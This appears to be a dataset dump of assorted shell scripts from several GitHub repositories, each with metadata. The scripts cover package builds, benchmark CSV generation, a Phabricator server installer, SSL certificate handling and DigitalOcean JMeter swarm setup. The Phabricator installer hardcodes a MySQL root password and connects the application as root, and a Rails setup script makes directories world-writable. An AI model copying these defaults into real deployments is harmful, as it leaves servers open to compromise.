if [[ ${cache_backend} == "redis" ]] && [[ ! ${magento_composer_content} =~ ${incompatible_magento_version_pattern} ]]; then
status "Using Redis backend for caching"
perl -i -p0e "s/\n*\);/${redis_configuration});/smg" "${MAGENTO_ROOT}/app/etc/env.php"
redis-cli flushall 2> >(logError) > >(log)
else
status "Using file system backend for caching"
fi
decrementNestingLevel
| true |
a68e11e2f59a735f2bc70d4da2181e3492b965dc | Shell | Gwinel/CHT-bench | /script/mkcsv.sh | UTF-8 | 1,005 | 2.890625 | 3 | [] | no_license | #!/bin/bash
update_rate=(0 10 20 40 80)
threads=(1 4 8 12 16 20 24 28 32 36 40 44 48 52 56 60 64)
initial_size=(1000 10000 100000 1000000 10000000)
#threads=(1 2 4 8 12 16 24 32 48 64)
#algs=(LFList LFArray LFArrayOpt SO AdaptiveArray AdaptiveArrayOpt WFList WFArray Benchmark )
#algs=(lf-ht_rcu_np hop_no_htm )
algs=(hop_htm)
for ratio in ${update_rate[*]}
do
for alg in ${algs[*]}
do
for thr in ${threads[*]}
do
for initial in ${initial_size[*]}
do
ofile=$alg."u$ratio"."i$initial".csv
echo -n $thr >> ./csv/$ofile
filename=./raw/output.$alg."n$thr"."u$ratio"."i$initial".csv
total=0
for i in `cat $filename`
do
total=$(echo $total + $i | bc)
done
avg=$(echo "$total / 5" | bc)
echo -n , $avg , >> ./csv/$ofile
cat $filename | sort -n | head -n 3 | tail -n 1 >> ./csv/$ofile
done
done
done
done
| true |
f5b9ca6e53359b0614784a84b35a83dcddb40e09 | Shell | aur-archive/dub | /PKGBUILD | UTF-8 | 658 | 2.5625 | 3 | [] | no_license | # Maintainer: Moritz Maxeiner <moritz@ucworks.org>
pkgname=dub
pkgver=0.9.18
pkgrel=1
pkgdesc="Package manager for D packages"
arch=('i686' 'x86_64')
url="https://github.com/rejectedsoftware/dub"
license=('MIT')
depends=('dmd' 'curl')
source=(${url}/archive/v${pkgver}.tar.gz)
conflicts=('dub-git')
md5sums=('d4e1d7656b828ca685ada96b350d1f87')
sha256sums=('0cbfb67a549beefd2b65a2779eff660b9057a9d51be017f9d46f48ad6e3214bf')
build()
{
cd "${srcdir}/${pkgname}-${pkgver}"
./build.sh
}
package()
{
cd "${srcdir}/${pkgname}-${pkgver}"
install -D -m755 bin/dub "${pkgdir}/usr/bin/dub"
install -D -m644 LICENSE.txt "${pkgdir}/usr/share/licenses/${pkgname}/LICENSE.txt"
}
| true |
bdd325f648481124a65051380dd0d0e9bbc58e9e | Shell | dvalerio001/Course-Work | /gale-shapely/run-gs1.py | UTF-8 | 1,432 | 3.296875 | 3 | [] | no_license | #!/bin/bash
# Script name: run-gs1
# Purpose: Run program gs1 (Gale-Shapley) with different input sizes,
# Purpose: time the execution and record in file data.txt;
# Purpose: then fit a model for the execution time and
# Purpose: report fit stats and a plot of data vs model
# Input: No input required
# Output: A window with the gnuplot graph fitting the model given in file model.gpt,
# Output: also, the statistics of the fit are displayed on stdout,
# Output: also data.txt is created, used, and later removed.
# Requirements: gs1.c must be compiled and the object must reside in
# Requirements: the same directory as this script.
# Requirements: File model.gpt should be created previously with
# Requirements: the gnuplot code defining the model, requesting
# Requirements: the fit and the plot.
# Requirements: The model should also reside in the same directory.
# Requirements: gnuplot 4.6 should be installed previously.
# Requirements: If a file data.txt exists it must have been generated by this script.
# Run gs1 and create (or append to) data.txt
# Successive runs data accumulate in data.txt
# Fit model, display results and plot graph
import os
import subprocess
f=open('data.txt','w')
for i in range (1000,2000,500):
proc = subprocess.Popen(('python3 gs1.py {}'.format(i)),stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell= True, universal_newlines=True)
os.system('gnuplot --persist model.gpt')
| true |
bf572005904bf3e8cb41da7ca862bc52d74596b2 | Shell | Azure/azure-quickstart-templates | /application-workloads/phabricator/phabricator-on-ubuntu/scripts/phabricator-install-ubuntu.sh | UTF-8 | 3,037 | 3.640625 | 4 | [
"MIT"
] | permissive | #!/bin/bash
cd /opt/
echo "PHABRICATOR UBUNTU INSTALL SCRIPT";
echo "This script will install Phabricator and all of its core dependencies.";
echo "Run it from the directory you want to install into.";
echo
ROOT=`pwd`
echo "Phabricator will be installed to: ${ROOT}.";
echo "Testing sudo..."
sudo true
if [ $? -ne 0 ]
then
echo "ERROR: You must be able to sudo to run this script.";
exit 1;
fi;
echo "Installing dependencies: git, apache, mysql, php...";
echo
set +x
sudo apt-get -qq update
sudo apt-get -y install git apache2 dpkg-dev php7.0 php7.0-mysql php7.0-gd php7.0-dev php7.0-curl php7.0-cli php7.0-json libapache2-mod-php7.0 php7.0-mbstring
# Enable mod_rewrite
sudo a2enmod rewrite
if [ ! -e libphutil ]
then
git clone https://github.com/phacility/libphutil.git
else
(cd libphutil && git pull --rebase)
fi
if [ ! -e arcanist ]
then
git clone https://github.com/phacility/arcanist.git
else
(cd arcanist && git pull --rebase)
fi
if [ ! -e phabricator ]
then
git clone https://github.com/phacility/phabricator.git
else
(cd phabricator && git pull --rebase)
fi
sudo echo 'mysql-server mysql-server/root_password password pass@word1' | debconf-set-selections
sudo echo 'mysql-server mysql-server/root_password_again password pass@word1' | debconf-set-selections
sudo apt-get -y install mysql-server
sudo touch /etc/apache2/sites-available/phabricator.conf
sudo echo "<VirtualHost *>" >> /etc/apache2/sites-available/phabricator.conf
sudo echo " ServerName $1" >> /etc/apache2/sites-available/phabricator.conf
sudo echo "" >> /etc/apache2/sites-available/phabricator.conf
sudo echo " DocumentRoot /opt/phabricator/webroot" >> /etc/apache2/sites-available/phabricator.conf
sudo echo "" >> /etc/apache2/sites-available/phabricator.conf
sudo echo " RewriteEngine on" >> /etc/apache2/sites-available/phabricator.conf
sudo echo " RewriteRule ^/rsrc/(.*) - [L,QSA]" >> /etc/apache2/sites-available/phabricator.conf
sudo echo " RewriteRule ^/favicon.ico - [L,QSA]" >> /etc/apache2/sites-available/phabricator.conf
sudo echo ' RewriteRule ^(.*)$ /index.php?__path__=$1 [B,L,QSA]' >> /etc/apache2/sites-available/phabricator.conf
sudo echo "</VirtualHost>" >> /etc/apache2/sites-available/phabricator.conf
sudo echo '<Directory "/opt/phabricator/webroot">' >> /etc/apache2/apache2.conf
sudo echo ' Require all granted' >> /etc/apache2/apache2.conf
sudo echo "</Directory>" >> /etc/apache2/apache2.conf
sudo a2dissite 000-default.conf
sudo a2ensite phabricator.conf
sudo service apache2 reload
sudo /opt/phabricator/bin/config set mysql.user root
sudo /opt/phabricator/bin/config set mysql.pass pass@word1
sudo /opt/phabricator/bin/storage upgrade --force
echo
echo "Install probably worked mostly correctly. Continue with the 'Configuration Guide':";
echo
echo " https://secure.phabricator.com/book/phabricator/article/configuration_guide/";
echo
echo "You can delete any php5-* stuff that's left over in this directory if you want.";
| true |
43ce4ce1a73401458c03afe8ef3f9627613069fa | Shell | Bulinator/minify | /minifierobfusc.sh | UTF-8 | 1,025 | 3.78125 | 4 | [] | no_license | #!/bin/sh
#Author: Bulot Geoffrey
#Release: 2016-12-07
echo "******************************";
echo "* *";
echo "* Compressing CSS/JS Files *";
echo "* *";
echo "******************************";
type=$1;
path=$2;
if [ $# -lt 2 ]; then
echo "\n\t Usage: <type> <path>";
else
echo "\nWork in progress...Please be patient for a while\n";
fi
saved=0
for f in `find -name "*.css" -not -name "*.min.css"`;
do
target=${f%.*}.min.css
echo "\t- "$f to $target
FILESIZE=$(stat -c%s "$f")
yui-compressor --type css --nomunge -o $target $f
FILESIZEC=$(stat -c%s "$target")
diff=$(($FILESIZE - $FILESIZEC))
saved=$(($saved + $diff))
echo "\t $diff bytes saved"
done
echo "\n";
echo "*******************************";
echo "* Total saved: $saved bytes *";
echo "*******************************";
echo "* *";
echo "* Bye Bye dude!! *";
echo "*******************************";
# params ?
chown www-data.www-data $path/*.min.css
| true |
a0c9887d44cb18ba8e77ec20e5d094f1b3938344 | Shell | x-Bun-x/CFW-old | /cfw/core/src/opt/cfw/scripts/led-blink.sh | UTF-8 | 927 | 3.734375 | 4 | [] | no_license | #!/bin/sh
LED_DEV=/sys/devices/platform/pmic_light.1/lit
CH_R=3
CH_G=4
CH_B=5
#
CUR_OFF=0
CUR_ON=1
DC_OFF=0
DC_ON=1
#BP=[0-3] : 0=1/256s 1=1/8s 2=1s 3=2s
BP_DEFAULT=0
led_ctrl() {
echo ch $1 > $LED_DEV
echo cur $2 > $LED_DEV
echo bp $3 > $LED_DEV
echo dc $4 > $LED_DEV
}
#$1 = ch
led_off() {
led_ctrl $1 $CUR_OFF $BP_DEFAULT $DC_OFF
}
led_off_all() {
led_off $CH_R
led_off $CH_G
led_off $CH_B
}
#$1 = color $2 = bp
led_on() {
BP=$2
R_ON=`expr \( $1 / 1 \) % 2`
G_ON=`expr \( $1 / 2 \) % 2`
B_ON=`expr \( $1 / 4 \) % 2`
if [ $R_ON -eq 1 ]; then
led_ctrl $CH_R $CUR_ON $BP $DC_ON
else
led_off $CH_R
fi
if [ $G_ON -eq 1 ]; then
led_ctrl $CH_G $CUR_ON $BP $DC_ON
else
led_off $CH_G
fi
if [ $B_ON -eq 1 ]; then
led_ctrl $CH_B $CUR_ON $BP $DC_ON
else
led_off $CH_B
fi
}
if [ "$1" = "OFF" ]; then
led_off_all
else
BP=$BP_DEFAULT
if [ "$2" != "" ]; then
BP=$2
fi
led_on $1 $BP
fi
| true |
3984e40402982ee6a8c357c431291c180a13d9a4 | Shell | animeshsutradhar/sslctl | /ssl_cli/csr_request.sh | UTF-8 | 1,306 | 2.859375 | 3 | [] | no_license | #!/bin/bash
##############################################################
# Script : SSL
# Author : Animesh Sutradhar
# Date : 20/03/2017
# Last Edited: 02/04/2017, Animesh Sutradhar
# Description: To request SSL certificate
##############################################################
# Purpose:
#
#
#
# Requirements:
#
#
#
#
#
#
# Method:
#
#
# Syntax:
#
#
# Notes:
#
##############################################################
######################################
#### Opening Initializations ####
######################################
cd /etc/httpd/ssl
echo -e "Enter your virtual host FQDN: "
read cert
cp -p $cert.csr /apps/scripts/ssl_cli/data/backup/$cert.csr_`date +"%d-%m-%Y"`
openssl x509 -req -days 365 -in $cert.csr -signkey $cert.key -out $cert.crt
rsync -avz $cert.crt /apps/scripts/ssl_cli/data/ >> /apps/scripts/ssl_cli/rsynch.log
echo "" >> /apps/scripts/ssl_cli/rsynch.log
echo "" >> /apps/scripts/ssl_cli/rsynch.log
date >> /apps/scripts/ssl_cli/rsynch.log
rsync -avz /apps/scripts/ssl_cli/data/ root@192.168.204.130:/apps/scripts/ssl/data/<HOST NAME> >> /apps/scripts/ssl_cli/rsynch.log 2> /apps/scripts/ssl_cli/error.log
echo "==============================================================================================" >> /apps/scripts/ssl_cli/rsynch.log
echo "Done"
| true |
0ad53de2bec9b5cc910f56bb8a7e1c8a0d68dbca | Shell | SirNave/dm-settings | /waybar/scripts/waybar-drives.sh | UTF-8 | 1,763 | 3.8125 | 4 | [] | no_license | #!/bin/bash
oldifs="$IFS";
IFS=$'\n';
disks=($(lsblk -o KNAME,PTTYPE,FSTYPE,LABEL,FSAVAIL,FSUSE%,MOUNTPOINT -nf));
IFS="$oldifs";
main_text='';
tooltip_text='';
for (( i=1; i<${#disks[@]}; i++ ));
do
disk_info=(${disks[i]});
if [ ${#disk_info[@]} == 2 ]
then
continue;
fi
disk_info_name=0;
disk_info_pttype=1;
disk_info_fstype=2;
disk_info_label=3;
disk_info_avail=4;
disk_info_fuse=5;
disk_info_path=6;
if [ ${#disk_info[@]} -ge 3 -a ${#disk_info[@]} -le 4 ]
then
tooltip_text="$tooltip_text${disk_info[disk_info_name]}\t${disk_info[disk_info_pttype]}\t${disk_info[disk_info_fstype]}\t${disk_info[disk_info_label]}\n";
elif [ ${#disk_info[@]} == 6 ]
then
tooltip_text="$tooltip_text${disk_info[disk_info_name]}\t${disk_info[disk_info_pttype]}\t${disk_info[disk_info_fstype]}\t\t${disk_info[3]}\t${disk_info[4]}\t${disk_info[5]}\n";
if [[ ${disk_info[6]} == "/" ]]
then
main_text=" ${disk_info[5]} ${disk_info[3]} ${disk_info[4]}";
fi
else
tooltip_text="$tooltip_text${disk_info[disk_info_name]}\t${disk_info[disk_info_pttype]}\t${disk_info[disk_info_fstype]}\t${disk_info[disk_info_label]}\t${disk_info[disk_info_avail]}\t${disk_info[disk_info_fuse]}\t${disk_info[disk_info_path]}\n";
if [[ ${disk_info[disk_info_path]} == "/" ]]
then
main_text=" ${disk_info[disk_info_path]} ${disk_info[disk_info_avail]} ${disk_info[disk_info_fuse]}";
fi
fi
done
# for disk in $disks;
# do
# disk_info=$disk;
# echo "Loop Found "$disk;
# done
echo "{\"text\": \"$main_text\", \"alt\": \"alt\", \"tooltip\": \"$tooltip_text\", \"class\": \"class\", \"percentage\": \"percentage\" }"; | true |
a684a5ab65d41f0bea6f30713b374740dc28aa3d | Shell | jackslinde35/TANOS | /scripts/00-copyOriginalData.sh | UTF-8 | 514 | 2.78125 | 3 | [
"MIT"
] | permissive | #! /bin/bash
tail -n +9 "${BASH_SOURCE[0]}" | head -n -1 | fold -s
exit 0
# Everything below this line is simple documentation
:'
This should be really be done manually. Simply copy the alignment file from wherever you presently have a copy to this project directory. The next step assumes it will be in the data/orig directory and named supermatrix_dna.phy. It is possible to change the name (manually). You could also modify the next step to run with amino acid alignments instead of nucleotide alignments.
'
| true |
9e6ed88a6fa8f472d6ba9569ebabe4809d481848 | Shell | Internet-of-Zoo-Things/dallas-iozt-pi-scripts | /setup2.sh | UTF-8 | 816 | 2.78125 | 3 | [] | no_license | # setup download directory
echo "> Setting up download directory"
cd ~/Desktop
mkdir code
cd code
# setting up projects
echo "> Cloning projects"
git clone https://github.com/Internet-of-Zoo-Things/dallas-iozt-app.git
git clone https://github.com/Internet-of-Zoo-Things/dallas-iozt-connectivity-server.git
echo "> Setting up dallas-iozt-app"
cd dallas-iozt-app
npm install
cp .env.example .env
npm run build
echo "> Setting up dallas-iozt-connectivity-server"
cd ../dallas-iozt-connectivity-server
pip install -r requirements.txt
# additional setup
cd ~/Desktop
mkdir logs
# run on boot
echo >> /home/pi/.bashrc
echo >> /home/pi/.bashrc
echo "# iozt startup" >> /home/pi/.bashrc
echo "sh ~/dallas-iozt-pi-scripts/run.sh" >> /home/pi/.bashrc
echo "> Pi setup complete. Please reboot for changes to take effect." | true |
eca476182dd0bda26f122e29aabb2db3371550e9 | Shell | TechMaster/arrowjs-installer | /shell_scripts/website/validate.sh | UTF-8 | 530 | 3.8125 | 4 | [] | no_license | #!/bin/bash
location=$1
use_nginx=$2
file_name=$3
# Analyze location
project_path=${location%/*}
project_name=${location##/*/}
# Check directory exists
if [ ! -d "$project_path" ]; then
echo "Directory is not exist!"
exit 127
fi
# Check directory empty
if [[ -d "$location" && "$(ls -A $location)" ]]; then
echo "Directory is not empty!"
exit 128
fi
if [ ! -z "$use_nginx" ]; then
if [ -f "/etc/nginx/conf.d/${file_name}" ]; then
echo "File config already exist"
exit 129
fi
fi
echo "" | true |
0d85d70e14691a59e60aa184515bc628b6a597a3 | Shell | lukairui/GoSpark | /shells/start-all.sh | UTF-8 | 576 | 3.078125 | 3 | [] | no_license | #!/bin/bash
# ssh-multi
# to ssh to multiple servers
starttmux() {
#local hosts=(vision24 vision28 vision35)
local hosts=(vision25 vision26 vision27 vision28 vision29 vision30 vision31 vision32 vision33 vision34 vision35 vision36 vision37 vision38)
local UNAME=XXX # removed for security reason
tmux new-window "ssh $UNAME@${hosts[0]}"
unset hosts[0];
for i in "${hosts[@]}"; do
tmux split-window -h "ssh $UNAME@$i"
tmux select-layout tiled > /dev/null
done
tmux select-pane -t 0
tmux set-window-option synchronize-panes on > /dev/null
}
HOSTS=${HOSTS:=$*}
starttmux
| true |
b354cbb4e514ca1a86d1a29679f185b42e82a7c1 | Shell | Bioconductor/BBS | /utils/build-universal.sh | UTF-8 | 423 | 3.015625 | 3 | [] | no_license | #!/bin/bash
#
# Script for building a universal binary package from the source package (tarball).
# Typical use:
#
# ./build-universal.sh affyio_1.5.8.tar.gz
#
# Note that this scripts does NOT check the source package!
#
# Author: Hervé Pagès <hpages.on.github@gmail.com>
# Last modified: 2007-08-11
INST_SCRIPT=`dirname "$0"`/macosx-inst-pkg.sh
MKTGZ_SCRIPT=`dirname "$0"`/macosx-make-tgz.sh
. $INST_SCRIPT
$MKTGZ_SCRIPT "$R_LIBS/$pkgname"
| true |
e536d3ad96f1ac08dc691b461134149e36f6f83a | Shell | Technius/dotfiles | /setup-scripts/pkgs.sh | UTF-8 | 294 | 3.421875 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# Installs packages; forces root since sudo might not be installed.
source $(dirname $0)/util.sh
if ! is_root; then
echo "You need to run this as root/sudo!"
fi
PKGS=$(cat $(dirname $0)/../debian-pkgs | sed -re 's/#.*//g' -e '/^\s*$/d')
apt-get update
apt-get install $PKGS
| true |
fc8f284b49b9b573021e417a01e81456844d41fd | Shell | hajaalin/LMUISA_iRODS | /LMUISA_test/Data_File_edit.sh | UTF-8 | 409 | 3.171875 | 3 | [] | no_license | echo $0
export input=`basename $0`.txt
echo test > $input
# go to the iRODS collection created for the test run
icd $Data
# import input file in iRODS
iput $input
echo
echo Before...
cat $input
ils
##
## action to test
##
echo test2 >> $input
iput -f $input
if [ $? -eq 0 ]
then
echo "LMUISA_ERROR: $0: iput -f should not succeed."
fi
echo
echo ... After
ils
rm $input
iget $input
cat $input
echo
| true |
f041fb2860afcdd9e1b0a665e13cdb264d541f62 | Shell | richyen/toolbox | /pg/fdw/sqlite_fdw/entrypoint.sh | UTF-8 | 1,119 | 2.890625 | 3 | [] | no_license | #!/bin/bash
yum -y install https://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm
yum -y install centos-release-scl-rh
yum -y install postgresql13-devel centos-release-scl-rh llvm-devel vim git sqlite-devel
yum -y groupinstall development
yum -y install postgresql${PGMAJOR}-contrib
su - postgres -c "pg_ctl -D /var/lib/pgsql/${PGMAJOR}/data start"
git clone https://github.com/pgspider/sqlite_fdw.git
cd sqlite_fdw && make USE_PGXS=1 && make USE_PGXS=1 install
sqlite3 /tmp/sqlite_fdw.db "CREATE TABLE person (id int, name text, dob text)"
sqlite3 /tmp/sqlite_fdw.db "INSERT INTO person VALUES (1, 'John Doe', '2020-01-01')"
psql -c "create extension sqlite_fdw" postgres postgres
psql -c "CREATE SERVER sqlite_server FOREIGN DATA WRAPPER sqlite_fdw options (database '/tmp/sqlite_fdw.db');" postgres postgres
psql -c "GRANT USAGE ON FOREIGN SERVER sqlite_server TO postgres" postgres postgres
psql -c "CREATE FOREIGN TABLE fdw_test (id int, name text, dob text) SERVER sqlite_server OPTIONS (table 'person')" postgres postgres
psql -c "select * from fdw_test;"
# Keep things running
tail -f /dev/null
| true |
672b8e61db336ea31416bbcb3381fc6cd2c71f34 | Shell | euevew/zksync | /sdk/zksync-crypto/build.sh | UTF-8 | 1,011 | 2.953125 | 3 | [
"Apache-2.0",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | #!/bin/bash
set -e
ASM=dist/zksync-crypto-bundler_bg_asm.js
which wasm-pack || cargo install wasm-pack
# pack for bundler (!note this verion is used in the pkg.browser field)
wasm-pack build --release --target=bundler --out-name=zksync-crypto-bundler --out-dir=dist
# convert the bundler build into JS in case the environment doesn't support WebAssembly
../build_binaryen.sh
../binaryen/bin/wasm2js ./dist/zksync-crypto-bundler_bg.wasm -o $ASM
# save another copy for bg_asm import
cp ./dist/zksync-crypto-bundler.js ./dist/zksync-crypto-bundler_asm.js
# fix imports for asm
sed -i.backup "s/^import.*/\
let wasm = require('.\/zksync-crypto-bundler_bg_asm.js');/" ./dist/zksync-crypto-bundler_asm.js
sed -i.backup "s/\.js/_asm\.js/g" $ASM
# pack for browser
wasm-pack build --release --target=web --out-name=zksync-crypto-web --out-dir=dist
# pack for node.js
wasm-pack build --release --target=nodejs --out-name=zksync-crypto-node --out-dir=dist
rm dist/package.json dist/.gitignore
rm dist/*.backup
| true |
d1b60ead4bbaf975fb9634dcfe95953c45d5c67b | Shell | tanboyu/automated-ChIP-and-RNAseq-pipeline-deployment | /run_v4.sh | UTF-8 | 911 | 3.1875 | 3 | [] | no_license | #!/bin/bash
flav=$(cat ~/env/flav)
diskspace=$(cat ~/env/diskspace)
img=$(nova image-list | grep "forde_base_xorg_butterfly" | awk ' { print $2 } ');
echo "Launching VM"
nova boot --flavor "$flav" --image "$img" mike-align-vm
echo "Waiting 5min for VM to come online"
sleep 300
export vm="$(nova list | grep 'mike-align-vm' | awk ' { print $2 } ')"
export hole="$(nova list | grep 'mike-align-vm' | awk ' { print $12 } ')"
export ip="$(echo $hole | sed 's/private=//g')"
echo "Transfer needed files"
eval $(ssh-agent)
scp -i ~/.ssh/mf-half.pem ~/inject.tar.gz ubuntu@"$ip":~
scp -i ~/.ssh/mf-half.pem ~/env/* ubuntu@"$ip":~
echo "Attach volumes to VM"
nova volume-create --display-name mike-align-temp "$diskspace"
vol="$(nova volume-list | grep 'mike-align-temp' | awk ' { print $2 } ')"
nova volume-attach "$vm" "$vol" /dev/vdc
ssh -i ~/.ssh/mf-half.pem ubuntu@"$ip" './p_v4.sh' && ./clean_v4.sh
exit 0
| true |
2accd3d34832f89ec7c79795c757939ccffc5579 | Shell | severinsimmler/hcrf | /ci/travis/osx/before_deploy.sh | UTF-8 | 507 | 3.078125 | 3 | [
"BSD-2-Clause",
"BSD-2-Clause-Views"
] | permissive | #!/bin/sh
set -e
. $(dirname $(dirname $0))/functions.sh
# --- Using proper Python executable -----------------------------------------
log Activating pyenv
eval "$(pyenv init -)"
pyenv shell $(pyenv versions --bare)
# --- Build and audit wheel --------------------------------------------------
log Cleaning previous build files
$PYTHON setup.py clean --all
log Building wheel with \`$PYTHON\`
$PYTHON setup.py sdist bdist_wheel
log Verifying distribution files with \`twine\`
twine check dist/*
| true |
bc85e674346a19ecaaa0e0c7cfa5070ffbeb3874 | Shell | rixed/clopinet | /compress | UTF-8 | 321 | 3.625 | 4 | [] | no_license | #!/bin/sh
dbdir=$1
if test -z "$dbdir" ; then
echo "compress what?"
exit 1
fi
find "$dbdir" -type f -name '*[0-9]' |
while read p ; do
f=$(basename "$p")
d=$(dirname "$p")
ff=$((f+1))
if test -e "$d/$ff" || test -e "$d/$ff.gz" ; then
echo "Compressing $p"
ionice -c 3 gzip --no-name -9 $p
fi
done
| true |
341757cfe1a86ffc29bff71662ca00f77548057d | Shell | mohammdali-davarzani/shell-scripts | /test_script.sh | UTF-8 | 165 | 3.171875 | 3 | [] | no_license | #!/bin/bash
kernel=$(uname -s)
if [ $kernel = 'Linux' ]
then
echo "I'm happy"
echo "we are on a linux system!"
else
echo "Oh :( what are you runnig there?"
fi
| true |
672e6bf22ef770eca526191d5338982e74ac689c | Shell | ololoshka2871/or1k-spartan6-platform-xip | /hdl/scripts/mksplited_image.sh | UTF-8 | 1,060 | 4.03125 | 4 | [] | no_license | #!/bin/bash
BOOTLOADER_IMAGE=$1
FPGA_DP_MEMORY_USE=$2
MEMORY_UNIT_SIZE=$3
OUTDIR=$4
BOOTLOADER_IMAGE_SIZE=`stat --printf="%s" ${BOOTLOADER_IMAGE}`
TEMPFILE=`mktemp`
function xxd_from() {
local IN_FILE=$1
local FROM=$2
local SIZE=$3
local OUT_FILE=$4
dd if=$IN_FILE skip=${FROM} bs=1 count=$SIZE 2> /dev/null | xxd -ps -c 4 > $OUT_FILE
}
function chr() {
[ "$1" -lt 256 ] || return 1
printf "\\$(printf '%03o' "$1")"
}
function ord() {
LC_CTYPE=C printf '%d' "'$1"
}
cat $BOOTLOADER_IMAGE > $TEMPFILE
zeros_needed=$((${MEMORY_UNIT_SIZE}*${FPGA_DP_MEMORY_USE}-${BOOTLOADER_IMAGE_SIZE}))
dd if=/dev/zero bs=$zeros_needed count=1 >> ${TEMPFILE} 2> /dev/null
START_V=`ord A`
OUTFILE_PATTERN=`echo $(basename ${BOOTLOADER_IMAGE}) | sed 's/\..*$/-part%s.bmm/'`
for((i=0;i<${FPGA_DP_MEMORY_USE};i++)); do
value=$((${START_V}+${i}))
part_file_name=`printf $OUTFILE_PATTERN $(chr ${value})`
xxd_from ${TEMPFILE} $((${MEMORY_UNIT_SIZE}*${i})) ${MEMORY_UNIT_SIZE} \
${OUTDIR}/${part_file_name}
done
#rm $TEMPFILE
| true |
5d766128c4359c679fcf894a5bff9d3143bbfdb7 | Shell | luciobian/forum-tdd | /install.sh | UTF-8 | 844 | 2.96875 | 3 | [] | no_license | # !/bin/bash
echo "Clonando..."
echo ""
git clone "https://github.com/luciobian/forum-tdd.git"
echo ""
echo ""
cd forum-tdd/forum
echo "Instalando dependencias.."
echo ""
composer install
chmod -R 777 storage bootstrap/cache
cp .env.example .env
php artisan key:generate
echo ""
read -p "Iniciar servicio de MySQL y luego presione ENTER para continuar" var
echo ""
if [ ${#var} -eq 0 ]; then
mysql --user="root" --password="" --execute="CREATE DATABASE laravel;"
echo ""
echo "Database 'laravel' creada..."
php artisan migrate
echo ""
echo "Tablas migradas..."
echo ""
php artisan db:fill
echo "Tablas cargadas con datos aleatoreos..."
fi
echo " "
echo " "
echo "Ejecutando tests..."
echo "-----------------------"
echo ""
echo ""
vendor/bin/phpunit
echo ""
echo ""
echo "-----------------------"
php artisan serve
| true |
331178aab378b5fde496664f91763458338b0f8a | Shell | vmarrazzo/jmeter-swarm | /do_setup_script.sh | UTF-8 | 2,555 | 3.625 | 4 | [] | no_license | #!/bin/sh -x
# This variable describe manager location
MANAGER_REGION="nyc3"
# This array describes workers location
declare -a WORKER_REGIONS=("ams3" "fra1" "lon1")
# DigitalOcean Access Token
export DO_TOKEN="your_digitalocean_access_token"
function to_do_creation(){
echo "--driver=digitalocean --digitalocean-access-token=${DO_TOKEN} --digitalocean-size=1gb --digitalocean-region=${1} --digitalocean-private-networking=true --digitalocean-image=ubuntu-16-04-x64"
}
# Manager machine name
MANAGER_ID=manager-${MANAGER_REGION}
# Create manager machine
docker-machine create \
$(to_do_creation $MANAGER_REGION) \
--engine-label role=$MANAGER_ID \
$MANAGER_ID
# This command extract real ip address
MANAGER_IP=`docker-machine ip $MANAGER_ID`
# Init docker swarm manager on machine
docker-machine ssh $MANAGER_ID "docker swarm init --advertise-addr ${MANAGER_IP}"
# Extract a token necessary to attach workers to swarm
WORKER_TOKEN=`docker-machine ssh $MANAGER_ID docker swarm join-token worker | grep token | awk '{ print $5 }'`
# this array holds worker machine names
declare -a WORKER_IDS=()
# Iterate over worker regions
for region in "${WORKER_REGIONS[@]}"
do
# Machine name
worker_machine_name=$(echo worker-${region})
# Create worker machine
docker-machine create \
$(to_do_creation $region) \
--engine-label role=$worker_machine_name \
$worker_machine_name
WORKER_IDS+=($worker_machine_name)
# Join to Swarm as worker
docker-machine ssh ${worker_machine_name} \
"docker swarm join --token ${WORKER_TOKEN} ${MANAGER_IP}:2377"
done
# Overlay network information
SUB_NET="172.23.0.0/16"
TEST_NET=my-overlay
# Switch swarm manager machine
eval $(docker-machine env $MANAGER_ID)
# From swarm manager overlay network creation
docker network create \
-d overlay \
--attachable \
--subnet=$SUB_NET $TEST_NET
# this array is necessary to hold containers name
declare -a JMETER_CONTAINERS=()
# for each worker machine
for id in "${WORKER_IDS[@]}"
do
# for three times we create JMeter slave service
# using engine label for scheduling
for index in $(seq -f "%02g" 1 3)
do
jmeter_container_name=$(echo ${id}_${index}_jmeter)
docker service create \
--name $jmeter_container_name \
--constraint "engine.labels.role==$id" \
--network $TEST_NET \
vmarrazzo/jmeter \
-s -n \
-Jclient.rmi.localport=7000 -Jserver.rmi.localport=60000 \
-Jserver.rmi.ssl.disable=true
# save container name
JMETER_CONTAINERS+=($jmeter_container_name)
done
done
| true |
61e7ab3f7d979b5b4370680421b0bb9f77cb97ae | Shell | adamkaplan/dotfiles | /setup.sh | UTF-8 | 542 | 2.78125 | 3 | [] | no_license | #!/usr/bin/env sh
LN="ln -sf"
SOURCE=`pwd`
`git submodule init 1>/dev/null`
`git submodule update --recursive 1>/dev/null`
# vim (core)
$LN $SOURCE/dot_vim/vimrc ~/.vimrc
# vim (pathogen)
mkdir ~/.vim
$LN $SOURCE/dot_vim/autoload ~/.vim/autoload
$LN $SOURCE/dot_vim/bundle ~/.vim/bundle
$LN $SOURCE/dot_vim/ftdetect ~/.vim/ftdetect
$LN $SOURCE/dot_vim/indent ~/.vim/indent
$LN $SOURCE/dot_vim/plugin ~/.vim/plugin
$LN $SOURCE/dot_vim/syntax ~/.vim/syntax
# tmux
$LN $SOURCE/tmux.conf ~/.tmux.conf
# oh-my-zsh
$LN $SOURCE/zshrc ~/.zshrc
| true |
d48a00f95ed00f1ed2c8877056a77cf8365620bd | Shell | opal/opal-rails | /bin/sandbox | UTF-8 | 941 | 3.25 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
gem_name="$(ruby -rpathname -e"puts Pathname(ARGV.first).join('../..').expand_path.glob('*.gemspec').first.basename('.gemspec')" -- $0)"
# Stay away from the bundler env of the containing extension.
function unbundled {
ruby -rbundler -e'b = proc {system *ARGV}; Bundler.respond_to?(:with_unbundled_env) ? Bundler.with_unbundled_env(&b) : Bundler.with_clean_env(&b)' -- $@
}
rm -rf ./sandbox
unbundled bundle exec rails new sandbox \
--skip-bundle \
--skip-git \
--skip-keeps \
--skip-rc \
--skip-spring \
--skip-test \
$@
if [ ! -d "sandbox" ]; then
echo 'sandbox rails application failed'
exit 1
fi
cd ./sandbox
cat <<RUBY >> Gemfile
gem '$gem_name', path: '..'
RUBY
unbundled bundle install --gemfile Gemfile
unbundled bin/rails webpacker:install
cd .. # Back to the project root.
bin/sandbox-setup # Run any custom setup.
echo
echo "🚀 Sandbox app successfully created for $gem_name!"
| true |
